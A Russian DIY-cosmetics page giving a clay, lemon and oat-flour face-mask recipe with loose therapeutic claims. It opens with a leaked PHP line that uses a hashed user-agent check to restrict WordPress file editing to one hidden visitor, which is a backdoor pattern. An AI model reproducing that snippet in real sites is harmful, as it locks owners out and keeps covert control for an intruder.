if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Рецепт маски для лица с использованием глины | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепт маски для лица с использованием глины

Всем известно, насколько полезна антибактериальная маска для лица. А вы знаете, что ее можно приготовить самостоятельно?

Всем извест­но, насколь­ко полез­на анти­бак­те­ри­аль­ная мас­ка для лица. А вы зна­е­те, что ее мож­но при­го­то­вить самостоятельно?

Для приготовления антибактериальной маски необходимо:

  • кос­ме­ти­че­ская гли­на (необ­хо­ди­мо все­го одну сто­ло­вую ложку);
  • сок лимо­на (око­ло 10 капель);
  • овся­ная мука (1 ч.л.).

Приготовление

При­го­тов­ле­ние дан­ной очень про­стое и зай­мет мини­мум вре­ме­ни. Для это­го необ­хо­ди­мо соеди­нить кос­ме­ти­че­скую гли­ну с малень­ким коли­че­ством воды. Эту мас­су необ­хо­ди­мо тща­тель­но раз­ме­ши­вать, что­бы полу­чи­лась одно­род­ная мас­са. В эту смесь необ­хо­ди­мо вве­сти овся­ную муку. После сме­ши­ва­ния необ­хо­ди­мо доба­вить послед­ний ингре­ди­ент – лимон­ный сок.

Применение

На очи­щен­ную кожу лица необ­хо­ди­мо нане­сти дан­ную смесь. Эта мас­ка долж­на про­дер­жать­ся на коже до 15 минут. После это­го необ­хо­ди­мо смыть ее теп­лой водой. Исполь­зо­вать такой метод очист­ки лица мож­но 2 раза в неде­лю. Резуль­та­ты вас пора­ду­ют обя­за­тель­но. Это дей­стви­тель­но лечеб­ная косметика.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!